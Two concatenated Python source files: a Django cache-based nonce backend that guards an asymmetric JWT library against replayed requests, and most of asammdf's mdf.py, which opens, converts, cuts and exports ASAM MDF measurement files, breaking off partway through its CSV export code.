# Source: crgwbr/asymmetric_jwt_auth, src/asymmetric_jwt_auth/nonce/django.py (license: ISC)
from django.core.cache import cache
from django.conf import settings
from .. import default_settings
from . import BaseNonceBackend
class DjangoCacheNonceBackend(BaseNonceBackend):
"""
Nonce backend which uses Django's cache system.
Simple, but not great. Prone to race conditions.
"""
def validate_nonce(self, username: str, timestamp: int, nonce: str) -> bool:
"""
Confirm that the given nonce hasn't already been used.
"""
key = self._create_nonce_key(username, timestamp)
used = cache.get(key, set([]))
return nonce not in used
def log_used_nonce(self, username: str, timestamp: int, nonce: str) -> None:
"""
Log a nonce as being used, and therefore henceforth invalid.
"""
key = self._create_nonce_key(username, timestamp)
used = cache.get(key, set([]))
used.add(nonce)
timestamp_tolerance = getattr(settings, 'ASYMMETRIC_JWT_AUTH', default_settings)['TIMESTAMP_TOLERANCE']
cache.set(key, used, timestamp_tolerance * 2)
def _create_nonce_key(self, username: str, timestamp: int) -> str:
"""
Create and return the cache key for storing nonces
"""
return '%s-nonces-%s-%s' % (
self.__class__.__name__,
username,
timestamp,
)
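
# Usage sketch for the backend above (illustrative only; it assumes Django is
# configured with a cache backend and an ASYMMETRIC_JWT_AUTH settings dict, and
# the username/timestamp/nonce values are placeholders):
#
#     backend = DjangoCacheNonceBackend()
#     if not backend.validate_nonce("alice", 1700000000, "n0nc3"):
#         raise PermissionError("nonce already used")  # reject the replayed request
#     backend.log_used_nonce("alice", 1700000000, "n0nc3")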
# Source: danielhrisca/asammdf, asammdf/mdf.py
# -*- coding: utf-8 -*-
""" common MDF file format module """
from collections import defaultdict, OrderedDict
from copy import deepcopy
import csv
from datetime import datetime, timezone
from functools import reduce
from io import BytesIO
import logging
from pathlib import Path
import re
from shutil import copy
from struct import unpack
import zipfile, gzip, bz2
from traceback import format_exc
import xml.etree.ElementTree as ET
from canmatrix import CanMatrix
import numpy as np
import pandas as pd
from .blocks import v2_v3_constants as v23c
from .blocks import v4_constants as v4c
from .blocks.bus_logging_utils import extract_mux
from .blocks.conversion_utils import from_dict
from .blocks.mdf_v2 import MDF2
from .blocks.mdf_v3 import MDF3
from .blocks.mdf_v4 import MDF4
from .blocks.utils import (
components,
csv_bytearray2hex,
csv_int2hex,
downcast,
is_file_like,
load_can_database,
master_using_raster,
matlab_compatible,
MDF2_VERSIONS,
MDF3_VERSIONS,
MDF4_VERSIONS,
MdfException,
plausible_timestamps,
randomized_string,
SUPPORTED_VERSIONS,
UINT16_u,
UINT64_u,
UniqueDB,
validate_version_argument,
)
from .blocks.v2_v3_blocks import ChannelConversion as ChannelConversionV3
from .blocks.v2_v3_blocks import ChannelExtension
from .blocks.v2_v3_blocks import HeaderBlock as HeaderV3
from .blocks.v4_blocks import ChannelConversion as ChannelConversionV4
from .blocks.v4_blocks import EventBlock, FileHistory
from .blocks.v4_blocks import HeaderBlock as HeaderV4
from .blocks.v4_blocks import SourceInformation
from .signal import Signal
from .version import __version__
logger = logging.getLogger("asammdf")
LOCAL_TIMEZONE = datetime.now(timezone.utc).astimezone().tzinfo
__all__ = ["MDF", "SUPPORTED_VERSIONS"]
def get_measurement_timestamp_and_version(mdf, file):
mdf.seek(64)
blk_id = mdf.read(2)
if blk_id == b"HD":
header = HeaderV3
version = "3.00"
else:
version = "4.00"
blk_id += mdf.read(2)
if blk_id == b"##HD":
header = HeaderV4
else:
raise MdfException(f'"{file}" is not a valid MDF file')
header = header(address=64, stream=mdf)
return header.start_time, version
class MDF:
"""Unified access to MDF v3 and v4 files. Underlying _mdf's attributes and
methods are linked to the `MDF` object via *setattr*. This is done to expose
them to the user code and for performance considerations.
Parameters
----------
name : string | BytesIO | zipfile.ZipFile | bz2.BZ2File | gzip.GzipFile
mdf file name (if provided it must be a real file name), file-like object or
compressed file opened as Python object
.. versionchanged:: 6.2.0
added support for zipfile.ZipFile, bz2.BZ2File and gzip.GzipFile
version : string
mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10', '3.20',
'3.30', '4.00', '4.10', '4.11', '4.20'); default '4.10'. This argument is
only used for MDF objects created from scratch; for MDF objects created
from a file the version is set to file version
channels : iterable
channel names that will be used for selective loading. This can dramatically
improve the file loading time.
.. versionadded:: 6.1.0
callback (\*\*kwargs) : function
keyword only argument: function to call to update the progress; the
function must accept two arguments (the current progress and maximum
progress value)
use_display_names (\*\*kwargs) : bool
keyword only argument: for MDF4 files parse the XML channel comment to
search for the display name; XML parsing is quite expensive so setting
this to *False* can decrease the loading times very much; default
*False*
remove_source_from_channel_names (\*\*kwargs) : bool
remove source from channel names ("Speed\XCP3" -> "Speed")
copy_on_get (\*\*kwargs) : bool
copy arrays in the get method; default *True*
expand_zippedfile (\*\*kwargs) : bool
only for bz2.BZ2File and gzip.GzipFile, load the file content into a
BytesIO before parsing (avoids the huge performance penalty of doing
random reads from the zipped file); default *True*
Examples
--------
>>> mdf = MDF(version='3.30') # new MDF object with version 3.30
>>> mdf = MDF('path/to/file.mf4') # MDF loaded from file
>>> mdf = MDF(BytesIO(data)) # MDF from file contents
>>> mdf = MDF(zipfile.ZipFile('data.zip')) # MDF creating using the first valid MDF from archive
>>> mdf = MDF(bz2.BZ2File('path/to/data.bz2', 'rb')) # MDF from bz2 object
>>> mdf = MDF(gzip.GzipFile('path/to/data.gzip', 'rb')) # MDF from gzip object
"""
_terminate = False
def __init__(self, name=None, version="4.10", channels=(), **kwargs):
self._mdf = None
expand_zippedfile = kwargs.pop("expand_zippedfile", True)
if name:
if is_file_like(name):
file_stream = name
do_close = False
if expand_zippedfile and isinstance(file_stream, (bz2.BZ2File, gzip.GzipFile)):
file_stream.seek(0)
file_stream = BytesIO(file_stream.read())
name = file_stream
elif isinstance(name, zipfile.ZipFile):
do_close = False
file_stream = name
for fn in file_stream.namelist():
if fn.lower().endswith(('mdf', 'dat', 'mf4')):
break
else:
raise MdfException("the ZIP archive does not contain any MDF file")
file_stream = name = BytesIO(file_stream.read(fn))
else:
name = Path(name)
if name.is_file():
do_close = True
file_stream = open(name, "rb")
else:
raise MdfException(f'File "{name}" does not exist')
file_stream.seek(0)
magic_header = file_stream.read(8)
if magic_header.strip() not in (b"MDF", b"UnFinMF"):
raise MdfException(
f'"{name}" is not a valid ASAM MDF file: magic header is {magic_header}'
)
file_stream.seek(8)
version = file_stream.read(4).decode("ascii").strip(" \0")
if not version:
file_stream.read(16)
version = unpack("<H", file_stream.read(2))[0]
version = str(version)
version = f"{version[0]}.{version[1:]}"
if do_close:
file_stream.close()
if version in MDF3_VERSIONS:
self._mdf = MDF3(name, channels=channels, **kwargs)
elif version in MDF4_VERSIONS:
self._mdf = MDF4(name, channels=channels, **kwargs)
elif version in MDF2_VERSIONS:
self._mdf = MDF2(name, channels=channels, **kwargs)
else:
message = f'"{name}" is not a supported MDF file; "{version}" file version was found'
raise MdfException(message)
else:
version = validate_version_argument(version)
if version in MDF2_VERSIONS:
self._mdf = MDF3(version=version, **kwargs)
elif version in MDF3_VERSIONS:
self._mdf = MDF3(version=version, **kwargs)
elif version in MDF4_VERSIONS:
self._mdf = MDF4(version=version, **kwargs)
else:
message = (
f'"{version}" is not a supported MDF file version; '
f"Supported versions are {SUPPORTED_VERSIONS}"
)
raise MdfException(message)
# we need a backreference to the MDF object to avoid it being garbage
# collected in code like this:
# MDF(filename).convert('4.10')
self._mdf._parent = self
def __setattr__(self, item, value):
if item == "_mdf":
super().__setattr__(item, value)
else:
setattr(self._mdf, item, value)
def __getattr__(self, item):
return getattr(self._mdf, item)
def __dir__(self):
return sorted(set(super().__dir__()) | set(dir(self._mdf)))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self._mdf is not None:
try:
self.close()
except:
pass
self._mdf = None
def __del__(self):
if self._mdf is not None:
try:
self.close()
except:
pass
self._mdf = None
def __lt__(self, other):
if self.header.start_time < other.header.start_time:
return True
elif self.header.start_time > other.header.start_time:
return False
else:
t_min = []
for i, group in enumerate(self.groups):
cycles_nr = group.channel_group.cycles_nr
if cycles_nr and i in self.masters_db:
master_min = self.get_master(i, record_offset=0, record_count=1)
if len(master_min):
t_min.append(master_min[0])
other_t_min = []
for i, group in enumerate(other.groups):
cycles_nr = group.channel_group.cycles_nr
if cycles_nr and i in other.masters_db:
master_min = other.get_master(i, record_offset=0, record_count=1)
if len(master_min):
other_t_min.append(master_min[0])
if not t_min or not other_t_min:
return True
else:
return min(t_min) < min(other_t_min)
def _transfer_events(self, other):
def get_scopes(event, events):
if event.scopes:
return event.scopes
else:
if event.parent is not None:
return get_scopes(events[event.parent], events)
elif event.range_start is not None:
return get_scopes(events[event.range_start], events)
else:
return event.scopes
if other.version >= "4.00":
for event in other.events:
if self.version >= "4.00":
new_event = deepcopy(event)
event_valid = True
for i, ref in enumerate(new_event.scopes):
try:
dg_cntr, ch_cntr = ref
try:
(self.groups[dg_cntr].channels[ch_cntr])
except:
event_valid = False
except TypeError:
dg_cntr = ref
try:
(self.groups[dg_cntr].channel_group)
except:
event_valid = False
# ignore attachments for now
for i in range(new_event.attachment_nr):
key = f"attachment_{i}_addr"
event[key] = 0
if event_valid:
self.events.append(new_event)
else:
ev_type = event.event_type
ev_range = event.range_type
ev_base = event.sync_base
ev_factor = event.sync_factor
timestamp = ev_base * ev_factor
try:
comment = ET.fromstring(
event.comment.replace(
' xmlns="http://www.asam.net/mdf/v4"', ""
)
)
pre = comment.find(".//pre_trigger_interval")
if pre is not None:
pre = float(pre.text)
else:
pre = 0.0
post = comment.find(".//post_trigger_interval")
if post is not None:
post = float(post.text)
else:
post = 0.0
comment = comment.find(".//TX")
if comment is not None:
comment = comment.text
else:
comment = ""
except:
pre = 0.0
post = 0.0
comment = event.comment
if comment:
comment += ": "
if ev_range == v4c.EVENT_RANGE_TYPE_BEGINNING:
comment += "Begin of "
elif ev_range == v4c.EVENT_RANGE_TYPE_END:
comment += "End of "
else:
comment += "Single point "
if ev_type == v4c.EVENT_TYPE_RECORDING:
comment += "recording"
elif ev_type == v4c.EVENT_TYPE_RECORDING_INTERRUPT:
comment += "recording interrupt"
elif ev_type == v4c.EVENT_TYPE_ACQUISITION_INTERRUPT:
comment += "acquisition interrupt"
elif ev_type == v4c.EVENT_TYPE_START_RECORDING_TRIGGER:
comment += "measurement start trigger"
elif ev_type == v4c.EVENT_TYPE_STOP_RECORDING_TRIGGER:
comment += "measurement stop trigger"
elif ev_type == v4c.EVENT_TYPE_TRIGGER:
comment += "trigger"
else:
comment += "marker"
scopes = get_scopes(event, other.events)
if scopes:
for i, ref in enumerate(scopes):
event_valid = True
try:
dg_cntr, ch_cntr = ref
try:
(self.groups[dg_cntr])
except:
event_valid = False
except TypeError:
dg_cntr = ref
try:
(self.groups[dg_cntr])
except:
event_valid = False
if event_valid:
self.add_trigger(
dg_cntr,
timestamp,
pre_time=pre,
post_time=post,
comment=comment,
)
else:
for i, _ in enumerate(self.groups):
self.add_trigger(
i,
timestamp,
pre_time=pre,
post_time=post,
comment=comment,
)
else:
for trigger_info in other.iter_get_triggers():
comment = trigger_info["comment"]
timestamp = trigger_info["time"]
group = trigger_info["group"]
if self.version < "4.00":
self.add_trigger(
group,
timestamp,
pre_time=trigger_info["pre_time"],
post_time=trigger_info["post_time"],
comment=comment,
)
else:
if timestamp:
ev_type = v4c.EVENT_TYPE_TRIGGER
else:
ev_type = v4c.EVENT_TYPE_START_RECORDING_TRIGGER
event = EventBlock(
event_type=ev_type,
sync_base=int(timestamp * 10 ** 9),
sync_factor=10 ** -9,
scope_0_addr=0,
)
event.comment = comment
event.scopes.append(group)
self.events.append(event)
def _transfer_header_data(self, other, message=""):
self.header.author = other.header.author
self.header.department = other.header.department
self.header.project = other.header.project
self.header.subject = other.header.subject
self.header.comment = other.header.comment
if self.version >= "4.00" and message:
fh = FileHistory()
fh.comment = f"""<FHcomment>
<TX>{message}</TX>
<tool_id>asammdf</tool_id>
<tool_vendor>asammdf</tool_vendor>
<tool_version>{__version__}</tool_version>
</FHcomment>"""
self.file_history = [fh]
@staticmethod
def _transfer_channel_group_data(sgroup, ogroup):
if not hasattr(sgroup, "acq_name") or not hasattr(ogroup, "acq_name"):
sgroup.comment = ogroup.comment
else:
sgroup.flags = ogroup.flags
sgroup.path_separator = ogroup.path_separator
sgroup.comment = ogroup.comment
sgroup.acq_name = ogroup.acq_name
acq_source = ogroup.acq_source
if acq_source:
sgroup.acq_source = acq_source.copy()
def _transfer_metadata(self, other, message=""):
self._transfer_events(other)
self._transfer_header_data(other, message)
def __contains__(self, channel):
""" if *'channel name'* in *'mdf file'* """
return channel in self.channels_db
def __iter__(self):
"""iterate over all the channels found in the file; master channels
are skipped from iteration
"""
yield from self.iter_channels()
def convert(self, version):
"""convert *MDF* to other version
Parameters
----------
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default '4.10'
Returns
-------
out : MDF
new *MDF* object
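Examples
--------
Convert a measurement to MDF version 4.10 and save the result (the file
names below are placeholders):

>>> with MDF('input.mf4') as mdf:
...     mdf.convert('4.10').save('converted.mf4')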
"""
version = validate_version_argument(version)
out = MDF(
version=version,
**self._kwargs
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
out.configure(from_other=self)
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
cg_nr = None
self.configure(copy_on_get=False)
# walk through all groups and get all channels
for i, virtual_group in enumerate(self.virtual_groups):
for idx, sigs in enumerate(
self._yield_selected_signals(virtual_group, version=version)
):
if idx == 0:
if sigs:
cg = self.groups[virtual_group].channel_group
cg_nr = out.append(
sigs,
common_timebase=True,
)
MDF._transfer_channel_group_data(
out.groups[cg_nr].channel_group, cg
)
else:
break
else:
out.extend(cg_nr, sigs)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
out._transfer_metadata(self, message=f"Converted from <{self.name}>")
self.configure(copy_on_get=True)
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def cut(
self,
start=None,
stop=None,
whence=0,
version=None,
include_ends=True,
time_from_zero=False,
):
"""cut *MDF* file. *start* and *stop* limits are absolute values
or values relative to the first timestamp depending on the *whence*
argument.
Parameters
----------
start : float
start time, default *None*. If *None* then the start of measurement
is used
stop : float
stop time, default *None*. If *None* then the end of measurement is
used
whence : int
how to search for the start and stop values
* 0 : absolute
* 1 : relative to first timestamp
version : str
new mdf file version from ('2.00', '2.10', '2.14', '3.00', '3.10',
'3.20', '3.30', '4.00', '4.10', '4.11', '4.20'); default *None* and in this
case the original file version is used
include_ends : bool
include the *start* and *stop* timestamps after cutting the signal.
If *start* and *stop* are found in the original timestamps, then
the new samples will be computed using interpolation. Default *True*
time_from_zero : bool
start time stamps from 0s in the cut measurement
Returns
-------
out : MDF
new MDF object
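Examples
--------
Keep only the data between 10s and 30s relative to the first timestamp
(the file names are placeholders):

>>> mdf = MDF('input.mf4')
>>> window = mdf.cut(start=10.0, stop=30.0, whence=1, time_from_zero=True)
>>> window.save('cut.mf4')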
"""
if version is None:
version = self.version
else:
version = validate_version_argument(version)
out = MDF(
version=version,
**self._kwargs,
)
integer_interpolation_mode = self._integer_interpolation
float_interpolation_mode = self._float_interpolation
out.configure(from_other=self)
self.configure(copy_on_get=False)
if whence == 1:
timestamps = []
for group in self.virtual_groups:
master = self.get_master(group, record_offset=0, record_count=1)
if master.size:
timestamps.append(master[0])
if timestamps:
first_timestamp = np.amin(timestamps)
else:
first_timestamp = 0
if start is not None:
start += first_timestamp
if stop is not None:
stop += first_timestamp
if time_from_zero:
delta = start
t_epoch = self.header.start_time.timestamp() + delta
out.header.start_time = datetime.fromtimestamp(t_epoch)
else:
delta = 0
out.header.start_time = self.header.start_time
groups_nr = len(self.virtual_groups)
if self._callback:
self._callback(0, groups_nr)
# walk through all groups and get all channels
for i, (group_index, virtual_group) in enumerate(self.virtual_groups.items()):
included_channels = self.included_channels(group_index)[group_index]
if not included_channels:
continue
idx = 0
signals = []
for j, sigs in enumerate(
self._yield_selected_signals(group_index, groups=included_channels)
):
if not sigs:
break
if j == 0:
master = sigs[0].timestamps
signals = sigs
else:
master = sigs[0][0]
if not len(master):
continue
needs_cutting = True
# check if this fragment is within the cut interval or
# if the cut interval has ended
if start is None and stop is None:
fragment_start = None
fragment_stop = None
start_index = 0
stop_index = len(master)
needs_cutting = False
elif start is None:
fragment_start = None
start_index = 0
if master[0] > stop:
break
else:
fragment_stop = min(stop, master[-1])
stop_index = np.searchsorted(
master, fragment_stop, side="right"
)
if stop_index == len(master):
needs_cutting = False
elif stop is None:
fragment_stop = None
if master[-1] < start:
continue
else:
fragment_start = max(start, master[0])
start_index = np.searchsorted(
master, fragment_start, side="left"
)
stop_index = len(master)
if start_index == 0:
needs_cutting = False
else:
if master[0] > stop:
break
elif master[-1] < start:
continue
else:
fragment_start = max(start, master[0])
start_index = np.searchsorted(
master, fragment_start, side="left"
)
fragment_stop = min(stop, master[-1])
stop_index = np.searchsorted(
master, fragment_stop, side="right"
)
if start_index == 0 and stop_index == len(master):
needs_cutting = False
# update the signal if this is not the first yield
if j:
for signal, (samples, invalidation) in zip(signals, sigs[1:]):
signal.samples = samples
signal.timestamps = master
signal.invalidation_bits = invalidation
if needs_cutting:
master = (
Signal(master, master, name="_")
.cut(
fragment_start,
fragment_stop,
include_ends,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
.timestamps
)
if not len(master):
continue
signals = [
sig.cut(
master[0],
master[-1],
include_ends=include_ends,
integer_interpolation_mode=integer_interpolation_mode,
float_interpolation_mode=float_interpolation_mode,
)
for sig in signals
]
else:
for sig in signals:
native = sig.samples.dtype.newbyteorder("=")
if sig.samples.dtype != native:
sig.samples = sig.samples.astype(native)
if time_from_zero:
master = master - delta
for sig in signals:
sig.timestamps = master
if idx == 0:
if start:
start_ = f"{start}s"
else:
start_ = "start of measurement"
if stop:
stop_ = f"{stop}s"
else:
stop_ = "end of measurement"
cg = self.groups[group_index].channel_group
cg_nr = out.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(
out.groups[cg_nr].channel_group, cg
)
else:
sigs = [(sig.samples, sig.invalidation_bits) for sig in signals]
sigs.insert(0, (master, None))
out.extend(cg_nr, sigs)
idx += 1
# if the cut interval is not found in the measurement
# then append a data group with 0 cycles
if idx == 0 and signals:
for sig in signals:
sig.samples = sig.samples[:0]
sig.timestamps = sig.timestamps[:0]
if sig.invalidation_bits is not None:
sig.invalidation_bits = sig.invalidation_bits[:0]
if start:
start_ = f"{start}s"
else:
start_ = "start of measurement"
if stop:
stop_ = f"{stop}s"
else:
stop_ = "end of measurement"
cg = self.groups[group_index].channel_group
cg_nr = out.append(
signals,
common_timebase=True,
)
MDF._transfer_channel_group_data(out.groups[cg_nr].channel_group, cg)
if self._callback:
self._callback(i + 1, groups_nr)
if self._terminate:
return
self.configure(copy_on_get=True)
out._transfer_metadata(self, message=f"Cut from {start_} to {stop_}")
if self._callback:
out._callback = out._mdf._callback = self._callback
return out
def export(self, fmt, filename=None, **kwargs):
r"""export *MDF* to other formats. The *MDF* file name is used is
available, else the *filename* argument must be provided.
The *pandas* export option was removed. You should use the method
*to_dataframe* instead.
Parameters
----------
fmt : string
can be one of the following:
* `csv` : CSV export that uses the "," delimiter. This option
will generate a new csv file for each data group
(<MDFNAME>_DataGroup_<cntr>.csv)
* `hdf5` : HDF5 file output; each *MDF* data group is mapped to
a *HDF5* group with the name 'DataGroup_<cntr>'
(where <cntr> is the index)
* `mat` : Matlab .mat version 4, 5 or 7.3 export. If
*single_time_base==False* the channels will be renamed in the mat
file to 'DG<cntr>_<channel name>'. The channel group
master will be renamed to 'DGM<cntr>_<channel name>'
( *<cntr>* is the data group index starting from 0)
* `parquet` : export to Apache parquet format
filename : string | pathlib.Path
export file name
\*\*kwargs
* `single_time_base`: resample all channels to common time base,
default *False*
* `raster`: float time raster for resampling. Valid if
*single_time_base* is *True*
* `time_from_zero`: adjust time channel to start from 0
* `use_display_names`: use display name instead of standard channel
name, if available.
* `empty_channels`: behaviour for channels without samples; the
options are *skip* or *zeros*; default is *skip*
* `format`: only valid for *mat* export; can be '4', '5' or '7.3',
default is '5'
* `oned_as`: only valid for *mat* export; can be 'row' or 'column'
* `keep_arrays` : keep arrays and structure channels as well as the
component channels. If *True* this can be very slow. If *False*
only the component channels are saved, and their names will be
prefixed with the parent channel.
* `reduce_memory_usage` : bool
reduce memory usage by converting all float columns to float32 and
searching for minimum dtype that can represent the values found
in integer columns; default *False*
* `compression` : str
compression to be used
* for ``parquet`` : "GZIP" or "SNAPPY"
* for ``hdf5`` : "gzip", "lzf" or "szip"
* for ``mat`` : bool
* `time_as_date` (False) : bool
export time as local timezone datetime; only valid for CSV export
.. versionadded:: 5.8.0
* `ignore_value2text_conversions` (False) : bool
valid only for the channels that have value to text conversions and
if *raw=False*. If this is True then the raw numeric values will be
used, and the conversion will not be applied.
.. versionadded:: 5.8.0
* raw (False) : bool
export all channels using the raw values
.. versionadded:: 6.0.0
* delimiter (',') : str
only valid for CSV: see cpython documentation for csv.Dialect.delimiter
.. versionadded:: 6.2.0
* doublequote (True) : bool
only valid for CSV: see cpython documentation for csv.Dialect.doublequote
.. versionadded:: 6.2.0
* escapechar (None) : str
only valid for CSV: see cpython documentation for csv.Dialect.escapechar
.. versionadded:: 6.2.0
* lineterminator ("\\r\\n") : str
only valid for CSV: see cpython documentation for csv.Dialect.lineterminator
.. versionadded:: 6.2.0
* quotechar ('"') : str
only valid for CSV: see cpython documentation for csv.Dialect.quotechar
.. versionadded:: 6.2.0
* quoting ("MINIMAL") : str
only valid for CSV: see cpython documentation for csv.Dialect.quoting. Use the
last part of the quoting constant name
.. versionadded:: 6.2.0
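Examples
--------
Export all channels to a single CSV file resampled to a 10 ms raster
(the file names are placeholders):

>>> with MDF('input.mf4') as mdf:
...     mdf.export('csv', filename='out.csv', single_time_base=True, raster=0.01)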
"""
header_items = (
"date",
"time",
"author_field",
"department_field",
"project_field",
"subject_field",
)
if fmt != "pandas" and filename is None and self.name is None:
message = (
"Must specify filename for export"
"if MDF was created without a file name"
)
logger.warning(message)
return
single_time_base = kwargs.get("single_time_base", False)
raster = kwargs.get("raster", None)
time_from_zero = kwargs.get("time_from_zero", True)
use_display_names = kwargs.get("use_display_names", True)
empty_channels = kwargs.get("empty_channels", "skip")
format = kwargs.get("format", "5")
oned_as = kwargs.get("oned_as", "row")
reduce_memory_usage = kwargs.get("reduce_memory_usage", False)
compression = kwargs.get("compression", "")
time_as_date = kwargs.get("time_as_date", False)
ignore_value2text_conversions = kwargs.get(
"ignore_value2text_conversions", False
)
raw = bool(kwargs.get("raw", False))
if compression == "SNAPPY":
try:
import snappy
except ImportError:
logger.warning(
"snappy compressor is not installed; compression will be set to GZIP"
)
compression = "GZIP"
filename = Path(filename) if filename else self.name
if fmt == "parquet":
try:
from fastparquet import write as write_parquet
except ImportError:
logger.warning(
"fastparquet not found; export to parquet is unavailable"
)
return
elif fmt == "hdf5":
try:
from h5py import File as HDF5
except ImportError:
logger.warning("h5py not found; export to HDF5 is unavailable")
return
elif fmt == "mat":
if format == "7.3":
try:
from hdf5storage import savemat
except ImportError:
logger.warning(
"hdf5storage not found; export to mat v7.3 is unavailable"
)
return
else:
try:
from scipy.io import savemat
except ImportError:
logger.warning("scipy not found; export to mat is unavailable")
return
elif fmt not in ("csv",):
raise MdfException(f"Export to {fmt} is not implemented")
name = ""
if self._callback:
self._callback(0, 100)
if single_time_base or fmt == "parquet":
df = self.to_dataframe(
raster=raster,
time_from_zero=time_from_zero,
use_display_names=use_display_names,
empty_channels=empty_channels,
reduce_memory_usage=reduce_memory_usage,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
units = OrderedDict()
comments = OrderedDict()
used_names = UniqueDB()
dropped = {}
groups_nr = len(self.groups)
for i, grp in enumerate(self.groups):
if self._terminate:
return
for ch in grp.channels:
if use_display_names:
channel_name = ch.display_name or ch.name
else:
channel_name = ch.name
channel_name = used_names.get_unique_name(channel_name)
if hasattr(ch, "unit"):
unit = ch.unit
if ch.conversion:
unit = unit or ch.conversion.unit
else:
unit = ""
comment = ch.comment
units[channel_name] = unit
comments[channel_name] = comment
if self._callback:
self._callback(i + 1, groups_nr * 2)
if fmt == "hdf5":
filename = filename.with_suffix(".hdf")
if single_time_base:
with HDF5(str(filename), "w") as hdf:
# header information
group = hdf.create_group(str(filename))
if self.version in MDF2_VERSIONS + MDF3_VERSIONS:
for item in header_items:
group.attrs[item] = self.header[item].replace(b"\0", b"")
# save each data group in a HDF5 group called
# "DataGroup_<cntr>" with the index starting from 1
# each HDF5 group will have a string attribute "master"
# that will hold the name of the master channel
count = len(df.columns)
for i, channel in enumerate(df):
samples = df[channel]
unit = units.get(channel, "")
comment = comments.get(channel, "")
if samples.dtype.kind == "O":
if isinstance(samples[0], np.ndarray):
samples = np.vstack(samples)
else:
continue
if compression:
dataset = group.create_dataset(
channel, data=samples, compression=compression
)
else:
dataset = group.create_dataset(channel, data=samples)
unit = unit.replace("\0", "")
if unit:
dataset.attrs["unit"] = unit
comment = comment.replace("\0", "")
if comment:
dataset.attrs["comment"] = comment
if self._callback:
self._callback(i + 1 + count, count * 2)
else:
with HDF5(str(filename), "w") as hdf:
# header information
group = hdf.create_group(str(filename))
if self.version in MDF2_VERSIONS + MDF3_VERSIONS:
for item in header_items:
group.attrs[item] = self.header[item].replace(b"\0", b"")
# save each channel group in a HDF5 group called
# "ChannelGroup_<cntr>" with the index starting from 0
# each HDF5 group will have a string attribute "master"
# that will hold the name of the master channel
groups_nr = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
channels = self.included_channels(group_index)[group_index]
if not channels:
continue
names = UniqueDB()
if self._terminate:
return
if len(virtual_group.groups) == 1:
comment = self.groups[
virtual_group.groups[0]
].channel_group.comment
else:
comment = "Virtual group i"
group_name = r"/" + f"ChannelGroup_{i}"
group = hdf.create_group(group_name)
group.attrs["comment"] = comment
master_index = self.masters_db.get(group_index, -1)
if master_index >= 0:
group.attrs["master"] = (
self.groups[group_index].channels[master_index].name
)
channels = [
(None, gp_index, ch_index)
for gp_index, channel_indexes in channels.items()
for ch_index in channel_indexes
]
if not channels:
continue
channels = self.select(channels, raw=raw)
for j, sig in enumerate(channels):
if use_display_names:
name = sig.display_name or sig.name
else:
name = sig.name
name = name.replace("\\", "_").replace("/", "_")
name = names.get_unique_name(name)
if reduce_memory_usage:
sig.samples = downcast(sig.samples)
if compression:
dataset = group.create_dataset(
name, data=sig.samples, compression=compression
)
else:
dataset = group.create_dataset(
name, data=sig.samples, dtype=sig.samples.dtype
)
unit = sig.unit.replace("\0", "")
if unit:
dataset.attrs["unit"] = unit
comment = sig.comment.replace("\0", "")
if comment:
dataset.attrs["comment"] = comment
if self._callback:
self._callback(i + 1, groups_nr)
elif fmt == "csv":
fmtparams = {
"delimiter": kwargs.get("delimiter", ",")[0],
"doublequote": kwargs.get("doublequote", True),
"lineterminator": kwargs.get("lineterminator", '\r\n'),
"quotechar": kwargs.get("quotechar", '"')[0],
}
quoting = kwargs.get("quoting", "MINIMAL").upper()
quoting = getattr(csv, f"QUOTE_{quoting}")
fmtparams["quoting"] = quoting
escapechar = kwargs.get("escapechar", None)
if escapechar is not None:
escapechar = escapechar[0]
fmtparams["escapechar"] = escapechar
if single_time_base:
filename = filename.with_suffix(".csv")
message = f'Writing csv export to file "{filename}"'
logger.info(message)
if time_as_date:
index = (
pd.to_datetime(
df.index + self.header.start_time.timestamp(), unit="s"
)
.tz_localize("UTC")
.tz_convert(LOCAL_TIMEZONE)
.astype(str)
)
df.index = index
df.index.name = "timestamps"
if hasattr(self, "can_logging_db") and self.can_logging_db:
dropped = {}
for name_ in df.columns:
if name_.endswith("CAN_DataFrame.ID"):
dropped[name_] = pd.Series(
csv_int2hex(df[name_].astype("<u4") & 0x1FFFFFFF),
index=df.index,
)
elif name_.endswith("CAN_DataFrame.DataBytes"):
dropped[name_] = pd.Series(
csv_bytearray2hex(df[name_]), index=df.index
)
df = df.drop(columns=list(dropped))
for name, s in dropped.items():
df[name] = s
with open(filename, "w", newline="") as csvfile:
writer = csv.writer(csvfile, **fmtparams)
names_row = [df.index.name, *df.columns]
writer.writerow(names_row)
if reduce_memory_usage:
vals = [df.index, *(df[name] for name in df)]
else:
vals = [
df.index.to_list(),
*(df[name].to_list() for name in df),
]
count = len(df.index)
if self._terminate:
return
for i, row in enumerate(zip(*vals)):
writer.writerow(row)
if self._callback:
self._callback(i + 1 + count, count * 2)
else:
filename = filename.with_suffix(".csv")
gp_count = len(self.virtual_groups)
for i, (group_index, virtual_group) in enumerate(
self.virtual_groups.items()
):
if self._terminate:
return
message = f"Exporting group {i+1} of {gp_count}"
logger.info(message)
if len(virtual_group.groups) == 1:
comment = self.groups[
virtual_group.groups[0]
].channel_group.comment
else:
comment = ""
if comment:
for char in r' \/:"':
comment = comment.replace(char, "_")
group_csv_name = (
filename.parent
/ f"{filename.stem}.ChannelGroup_{i}_{comment}.csv"
)
else:
group_csv_name = (
filename.parent / f"{filename.stem}.ChannelGroup_{i}.csv"
)
df = self.get_group(
group_index,
raster=raster,
time_from_zero=time_from_zero,
use_display_names=use_display_names,
reduce_memory_usage=reduce_memory_usage,
ignore_value2text_conversions=ignore_value2text_conversions,
raw=raw,
)
if time_as_date:
index = (
pd.to_datetime(
df.index + self.header.start_time.timestamp(), unit="s"
)
.tz_localize("UTC")
.tz_convert(LOCAL_TIMEZONE)
.astype(str)
)
df.index = index
df.index.name = "timestamps"
with open(group_csv_name, "w", newline="") as csvfile:
writer = csv.writer(csvfile, **fmtparams)
